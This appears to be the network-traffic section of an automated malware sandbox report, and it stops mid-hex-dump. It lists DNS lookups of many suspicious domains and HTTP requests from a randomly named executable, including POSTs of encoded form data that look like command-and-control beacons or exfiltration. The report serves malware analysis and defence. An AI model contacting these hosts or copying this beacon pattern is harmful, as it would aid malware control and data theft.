                                      Jun 10, 2024 10:24:02.142359018 CEST80514183.64.163.50192.168.2.5
                                      Jun 10, 2024 10:24:07.406132936 CEST5141980192.168.2.5172.67.160.38
                                      Jun 10, 2024 10:24:07.412236929 CEST8051419172.67.160.38192.168.2.5
                                      Jun 10, 2024 10:24:07.412318945 CEST5141980192.168.2.5172.67.160.38
                                      Jun 10, 2024 10:24:07.414326906 CEST5141980192.168.2.5172.67.160.38
                                      Jun 10, 2024 10:24:07.419162989 CEST8051419172.67.160.38192.168.2.5
                                      Jun 10, 2024 10:24:08.020169973 CEST8051419172.67.160.38192.168.2.5
                                      Jun 10, 2024 10:24:08.021600962 CEST8051419172.67.160.38192.168.2.5
                                      Jun 10, 2024 10:24:08.022145033 CEST5141980192.168.2.5172.67.160.38
                                      Jun 10, 2024 10:24:09.247416973 CEST5141980192.168.2.5172.67.160.38
                                      Jun 10, 2024 10:24:10.266415119 CEST5142080192.168.2.5172.67.160.38
                                      Jun 10, 2024 10:24:10.271400928 CEST8051420172.67.160.38192.168.2.5
                                      Jun 10, 2024 10:24:10.274085045 CEST5142080192.168.2.5172.67.160.38
                                      Jun 10, 2024 10:24:10.278191090 CEST5142080192.168.2.5172.67.160.38
                                      Jun 10, 2024 10:24:10.283138037 CEST8051420172.67.160.38192.168.2.5
                                      Jun 10, 2024 10:24:10.864821911 CEST8051420172.67.160.38192.168.2.5
                                      Jun 10, 2024 10:24:10.865904093 CEST8051420172.67.160.38192.168.2.5
                                      Jun 10, 2024 10:24:10.865981102 CEST5142080192.168.2.5172.67.160.38
                                      Jun 10, 2024 10:24:11.778601885 CEST5142080192.168.2.5172.67.160.38
                                      Jun 10, 2024 10:24:12.797034025 CEST5142180192.168.2.5172.67.160.38
                                      Jun 10, 2024 10:24:12.802093029 CEST8051421172.67.160.38192.168.2.5
                                      Jun 10, 2024 10:24:12.802236080 CEST5142180192.168.2.5172.67.160.38
                                      Jun 10, 2024 10:24:12.804169893 CEST5142180192.168.2.5172.67.160.38
                                      Jun 10, 2024 10:24:12.809118986 CEST8051421172.67.160.38192.168.2.5
                                      Jun 10, 2024 10:24:12.809242010 CEST8051421172.67.160.38192.168.2.5
                                      Jun 10, 2024 10:24:13.422354937 CEST8051421172.67.160.38192.168.2.5
                                      Jun 10, 2024 10:24:13.423638105 CEST8051421172.67.160.38192.168.2.5
                                      Jun 10, 2024 10:24:13.423748970 CEST5142180192.168.2.5172.67.160.38
                                      Jun 10, 2024 10:24:14.309909105 CEST5142180192.168.2.5172.67.160.38
                                      Jun 10, 2024 10:24:15.328063965 CEST5142280192.168.2.5172.67.160.38
                                      Jun 10, 2024 10:24:15.333184958 CEST8051422172.67.160.38192.168.2.5
                                      Jun 10, 2024 10:24:15.333286047 CEST5142280192.168.2.5172.67.160.38
                                      Jun 10, 2024 10:24:15.334767103 CEST5142280192.168.2.5172.67.160.38
                                      Jun 10, 2024 10:24:15.339658022 CEST8051422172.67.160.38192.168.2.5
                                      Jun 10, 2024 10:24:15.937398911 CEST8051422172.67.160.38192.168.2.5
                                      Jun 10, 2024 10:24:15.939276934 CEST8051422172.67.160.38192.168.2.5
                                      Jun 10, 2024 10:24:15.939415932 CEST5142280192.168.2.5172.67.160.38
                                      Jun 10, 2024 10:24:15.940115929 CEST5142280192.168.2.5172.67.160.38
                                      Jun 10, 2024 10:24:15.945317030 CEST8051422172.67.160.38192.168.2.5

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jun 10, 2024 10:20:47.071305037 CEST5382453192.168.2.51.1.1.1
                                      Jun 10, 2024 10:20:47.376724958 CEST53538241.1.1.1192.168.2.5
                                      Jun 10, 2024 10:20:47.598378897 CEST5357629162.159.36.2192.168.2.5
                                      Jun 10, 2024 10:20:48.217853069 CEST53621661.1.1.1192.168.2.5
                                      Jun 10, 2024 10:21:03.579582930 CEST5700253192.168.2.51.1.1.1
                                      Jun 10, 2024 10:21:03.631679058 CEST53570021.1.1.1192.168.2.5
                                      Jun 10, 2024 10:21:17.453517914 CEST5904053192.168.2.51.1.1.1
                                      Jun 10, 2024 10:21:17.514245987 CEST53590401.1.1.1192.168.2.5
                                      Jun 10, 2024 10:21:30.892781973 CEST6391453192.168.2.51.1.1.1
                                      Jun 10, 2024 10:21:31.246241093 CEST53639141.1.1.1192.168.2.5
                                      Jun 10, 2024 10:21:45.286137104 CEST4966153192.168.2.51.1.1.1
                                      Jun 10, 2024 10:21:45.325583935 CEST53496611.1.1.1192.168.2.5
                                      Jun 10, 2024 10:21:59.361474991 CEST5147553192.168.2.51.1.1.1
                                      Jun 10, 2024 10:21:59.682296038 CEST53514751.1.1.1192.168.2.5
                                      Jun 10, 2024 10:22:13.126899004 CEST5624553192.168.2.51.1.1.1
                                      Jun 10, 2024 10:22:13.940466881 CEST53562451.1.1.1192.168.2.5
                                      Jun 10, 2024 10:22:28.097841978 CEST5756953192.168.2.51.1.1.1
                                      Jun 10, 2024 10:22:28.411879063 CEST53575691.1.1.1192.168.2.5
                                      Jun 10, 2024 10:22:42.753951073 CEST6031553192.168.2.51.1.1.1
                                      Jun 10, 2024 10:22:43.655594110 CEST53603151.1.1.1192.168.2.5
                                      Jun 10, 2024 10:22:57.470616102 CEST5256053192.168.2.51.1.1.1
                                      Jun 10, 2024 10:22:57.894004107 CEST53525601.1.1.1192.168.2.5
                                      Jun 10, 2024 10:23:11.565479040 CEST5524453192.168.2.51.1.1.1
                                      Jun 10, 2024 10:23:11.644712925 CEST53552441.1.1.1192.168.2.5
                                      Jun 10, 2024 10:23:25.298861027 CEST5858053192.168.2.51.1.1.1
                                      Jun 10, 2024 10:23:25.907840967 CEST53585801.1.1.1192.168.2.5
                                      Jun 10, 2024 10:23:39.829741955 CEST5400253192.168.2.51.1.1.1
                                      Jun 10, 2024 10:23:39.843014956 CEST53540021.1.1.1192.168.2.5
                                      Jun 10, 2024 10:23:53.423464060 CEST5669453192.168.2.51.1.1.1
                                      Jun 10, 2024 10:23:53.438527107 CEST53566941.1.1.1192.168.2.5
                                      Jun 10, 2024 10:24:07.232846975 CEST6040653192.168.2.51.1.1.1
                                      Jun 10, 2024 10:24:07.402844906 CEST53604061.1.1.1192.168.2.5
                                      Jun 10, 2024 10:24:20.955142021 CEST4971053192.168.2.51.1.1.1
                                      Jun 10, 2024 10:24:21.091758013 CEST53497101.1.1.1192.168.2.5

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Jun 10, 2024 10:20:47.071305037 CEST192.168.2.51.1.1.10xe5ebStandard query (0)www.am1-728585.comA (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:21:03.579582930 CEST192.168.2.51.1.1.10x8192Standard query (0)www.witoharmuth.comA (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:21:17.453517914 CEST192.168.2.51.1.1.10x2568Standard query (0)www.magnoliahairandco.comA (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:21:30.892781973 CEST192.168.2.51.1.1.10x774cStandard query (0)www.binpvae.lolA (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:21:45.286137104 CEST192.168.2.51.1.1.10x671aStandard query (0)www.duzane.comA (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:21:59.361474991 CEST192.168.2.51.1.1.10x580aStandard query (0)www.mg55aa.xyzA (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:22:13.126899004 CEST192.168.2.51.1.1.10xfdeStandard query (0)www.ie8mce.websiteA (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:22:28.097841978 CEST192.168.2.51.1.1.10xf4bStandard query (0)www.shrongcen.comA (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:22:42.753951073 CEST192.168.2.51.1.1.10xe026Standard query (0)www.skyinftech.comA (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:22:57.470616102 CEST192.168.2.51.1.1.10x6330Standard query (0)www.chowzen.topA (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:23:11.565479040 CEST192.168.2.51.1.1.10x55a7Standard query (0)www.lecoinsa.netA (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:23:25.298861027 CEST192.168.2.51.1.1.10x109eStandard query (0)www.zhuan-tou.comA (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:23:39.829741955 CEST192.168.2.51.1.1.10xdb12Standard query (0)www.kacotae.comA (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:23:53.423464060 CEST192.168.2.51.1.1.10x1b69Standard query (0)www.webuyfontana.comA (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:24:07.232846975 CEST192.168.2.51.1.1.10x8eefStandard query (0)www.lunareafurniture.comA (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:24:20.955142021 CEST192.168.2.51.1.1.10xecf7Standard query (0)www.ffuel.networkA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Jun 10, 2024 10:20:47.376724958 CEST1.1.1.1192.168.2.50xe5ebNo error (0)www.am1-728585.com101.36.121.143A (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:21:03.631679058 CEST1.1.1.1192.168.2.50x8192No error (0)www.witoharmuth.com85.13.162.190A (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:21:17.514245987 CEST1.1.1.1192.168.2.50x2568No error (0)www.magnoliahairandco.comcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                      Jun 10, 2024 10:21:17.514245987 CEST1.1.1.1192.168.2.50x2568No error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                      Jun 10, 2024 10:21:17.514245987 CEST1.1.1.1192.168.2.50x2568No error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:21:31.246241093 CEST1.1.1.1192.168.2.50x774cNo error (0)www.binpvae.lol116.213.43.190A (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:21:45.325583935 CEST1.1.1.1192.168.2.50x671aNo error (0)www.duzane.com102.222.124.13A (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:21:59.682296038 CEST1.1.1.1192.168.2.50x580aNo error (0)www.mg55aa.xyz35.241.34.216A (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:22:13.940466881 CEST1.1.1.1192.168.2.50xfdeNo error (0)www.ie8mce.website176.113.70.180A (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:22:28.411879063 CEST1.1.1.1192.168.2.50xf4bNo error (0)www.shrongcen.com101.36.121.143A (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:22:43.655594110 CEST1.1.1.1192.168.2.50xe026No error (0)www.skyinftech.comskyinftech.comCNAME (Canonical name)IN (0x0001)false
                                      Jun 10, 2024 10:22:43.655594110 CEST1.1.1.1192.168.2.50xe026No error (0)skyinftech.com103.138.88.32A (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:22:57.894004107 CEST1.1.1.1192.168.2.50x6330No error (0)www.chowzen.top162.0.213.72A (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:23:11.644712925 CEST1.1.1.1192.168.2.50x55a7No error (0)www.lecoinsa.net217.116.0.191A (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:23:25.907840967 CEST1.1.1.1192.168.2.50x109eNo error (0)www.zhuan-tou.com103.120.80.111A (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:23:39.843014956 CEST1.1.1.1192.168.2.50xdb12No error (0)www.kacotae.com64.226.69.42A (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:23:53.438527107 CEST1.1.1.1192.168.2.50x1b69No error (0)www.webuyfontana.com3.64.163.50A (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:24:07.402844906 CEST1.1.1.1192.168.2.50x8eefNo error (0)www.lunareafurniture.com172.67.160.38A (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:24:07.402844906 CEST1.1.1.1192.168.2.50x8eefNo error (0)www.lunareafurniture.com104.21.14.186A (IP address)IN (0x0001)false
                                      Jun 10, 2024 10:24:21.091758013 CEST1.1.1.1192.168.2.50xecf7No error (0)www.ffuel.network193.149.176.221A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • www.am1-728585.com
                                      • www.witoharmuth.com
                                      • www.magnoliahairandco.com
                                      • www.binpvae.lol
                                      • www.duzane.com
                                      • www.mg55aa.xyz
                                      • www.ie8mce.website
                                      • www.shrongcen.com
                                      • www.skyinftech.com
                                      • www.chowzen.top
                                      • www.lecoinsa.net
                                      • www.zhuan-tou.com
                                      • www.kacotae.com
                                      • www.webuyfontana.com
                                      • www.lunareafurniture.com

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.549717101.36.121.143802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:20:47.394016027 CEST457OUTGET /9yv1/?kH=00U8ENLHk&TTv82Lg=JDOq8sdeR7GiqYjlH1+Kl93ySCj4A7pMbAnb3QvwXz09Z+TZO8TEz9zOGDteEA1FR7OBJaMhM3F8CenkIFufyI1/tJZv1FUS2g72fmKkU9bvVaC3pZ4GqQYdgiVFYuGLpQ== HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.am1-728585.com
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:20:48.354218960 CEST318INHTTP/1.1 404 Not Found
                                      Server: nginx/1.20.1
                                      Date: Mon, 10 Jun 2024 08:20:48 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 153
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.55136785.13.162.190802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:21:03.645113945 CEST723OUTPOST /jd4u/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.witoharmuth.com
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.witoharmuth.com
                                      Referer: http://www.witoharmuth.com/jd4u/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 69 62 55 76 61 56 39 4f 66 68 52 48 76 38 70 46 7a 4e 68 69 45 36 6f 6a 2f 55 6b 39 54 74 52 55 6e 45 72 41 59 4a 41 51 6d 32 43 2f 6f 30 47 72 54 50 71 4c 65 52 75 32 46 38 46 32 57 45 38 6f 30 49 55 52 6c 6b 6c 39 39 5a 5a 36 37 5a 6d 70 32 46 70 6f 2f 6b 71 58 79 72 6e 6d 33 4b 72 56 37 32 52 39 6a 6d 76 64 37 64 4e 4b 59 30 54 52 58 62 4d 34 78 58 34 77 34 63 54 51 48 56 5a 48 42 2b 54 54 4a 51 7a 41 71 37 4c 59 72 4e 6e 35 45 5a 4e 41 45 56 53 74 33 6a 6b 64 7a 46 64 4a 42 6c 63 45 58 69 32 44 31 7a 49 70 4b 52 69 6a 4a 42 59 77 46 4a 37 6e 66 53 45 55 44 47 43 50 52 41 75 37 41 6b 73 3d
                                      Data Ascii: TTv82Lg=ibUvaV9OfhRHv8pFzNhiE6oj/Uk9TtRUnErAYJAQm2C/o0GrTPqLeRu2F8F2WE8o0IURlkl99ZZ67Zmp2Fpo/kqXyrnm3KrV72R9jmvd7dNKY0TRXbM4xX4w4cTQHVZHB+TTJQzAq7LYrNn5EZNAEVSt3jkdzFdJBlcEXi2D1zIpKRijJBYwFJ7nfSEUDGCPRAu7Aks=
                                      Jun 10, 2024 10:21:04.652988911 CEST1236INHTTP/1.1 404 Not Found
                                      Date: Mon, 10 Jun 2024 08:21:04 GMT
                                      Server: Apache
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Link: <https://www.witoharmuth.de/wp-json/>; rel="https://api.w.org/"
                                      Upgrade: h2,h2c
                                      Connection: Upgrade, close
                                      Vary: User-Agent
                                      Transfer-Encoding: chunked
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 [TRUNCATED]
                                      Data Ascii: 2000<!DOCTYPE html><html lang="de-DE"><head><meta charset='UTF-8'><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Seite nicht gefunden &#8211; witoharmuth.de</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//www.witoharmuth.de' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="witoharmuth.de &raquo; Feed" href="https://www.witoharmuth.de/feed/" /><link rel="alternate" type="application/rss+xml" title="witoharmuth.de &raquo; Kommentar-Feed" href="https://www.witoharmuth.de/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","sv
                                      Jun 10, 2024 10:21:04.653104067 CEST1236INData Raw: 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75
                                      Data Ascii: gUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.witoharmuth.de\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.4"}};/*! This file is auto-generated */!function(i,n){var o,
                                      Jun 10, 2024 10:21:04.653139114 CEST424INData Raw: 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62
                                      Data Ascii: n f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});r
                                      Jun 10, 2024 10:21:04.653207064 CEST1236INData Raw: 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d
                                      Data Ascii: Supports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem
                                      Jun 10, 2024 10:21:04.653240919 CEST1236INData Raw: 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 65 3d 6e 2e 73
                                      Data Ascii: {return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><s
                                      Jun 10, 2024 10:21:04.653276920 CEST424INData Raw: 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d
                                      Data Ascii: preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivi
                                      Jun 10, 2024 10:21:04.653310061 CEST1236INData Raw: 64 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 30 36 39 33 65 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 23 39 62 35 31 65 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f
                                      Data Ascii: d-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--color--accent: #e91e63;--wp--preset--color--background-color: #1e73be;--wp--preset--color--header-gradient: #a81d84;--wp--preset--gradient--vivid-cyan-blue-to-vivid-
                                      Jun 10, 2024 10:21:04.653343916 CEST1236INData Raw: 25 2c 72 67 62 28 31 30 37 2c 30 2c 36 32 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65
                                      Data Ascii: %,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50
                                      Jun 10, 2024 10:21:04.653376102 CEST1236INData Raw: 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 7b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 7d 62 6f 64 79 20 2e 69 73 2d
                                      Data Ascii: }:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}body .is-layout-flex{flex-wrap: wrap;align-items: center;}body .is-layout-flex > *{margin: 0;}body .is-layout-grid{display: grid;}body .is-layout-grid > *{margin: 0;}:whe
                                      Jun 10, 2024 10:21:04.653409958 CEST636INData Raw: 79 61 6e 2d 62 6c 75 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69
                                      Data Ascii: yan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important
                                      Jun 10, 2024 10:21:04.653445959 CEST1236INData Raw: 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65
                                      Data Ascii: has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-ambe


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.55136885.13.162.190802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:21:06.180073977 CEST743OUTPOST /jd4u/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.witoharmuth.com
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.witoharmuth.com
                                      Referer: http://www.witoharmuth.com/jd4u/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 69 62 55 76 61 56 39 4f 66 68 52 48 75 64 35 46 2f 4b 31 69 54 4b 6f 67 6a 45 6b 39 49 64 52 51 6e 45 6e 41 59 4d 34 41 6c 45 6d 2f 6f 57 4f 72 53 4f 71 4c 66 52 75 32 64 4d 46 7a 62 6b 39 46 30 49 5a 69 6c 6c 4a 39 39 5a 6c 36 37 62 75 70 33 79 64 72 2b 30 71 56 70 62 6e 6b 71 61 72 56 37 32 52 39 6a 6d 54 6e 37 65 39 4b 59 6c 6a 52 51 4f 77 35 74 6e 34 7a 39 73 54 51 44 56 59 41 42 2b 54 78 4a 51 44 75 71 2b 48 59 72 50 2f 35 44 4c 31 44 4f 56 54 6d 35 44 6c 7a 39 77 77 54 4d 44 41 2b 4b 42 48 53 6e 41 30 33 50 6e 50 4a 54 6a 51 59 57 70 58 66 50 42 4d 6a 53 32 6a 6d 4c 6a 2b 4c 65 7a 37 74 6d 78 46 4a 42 77 37 41 56 55 4b 36 53 6c 57 48 62 4e 50 51
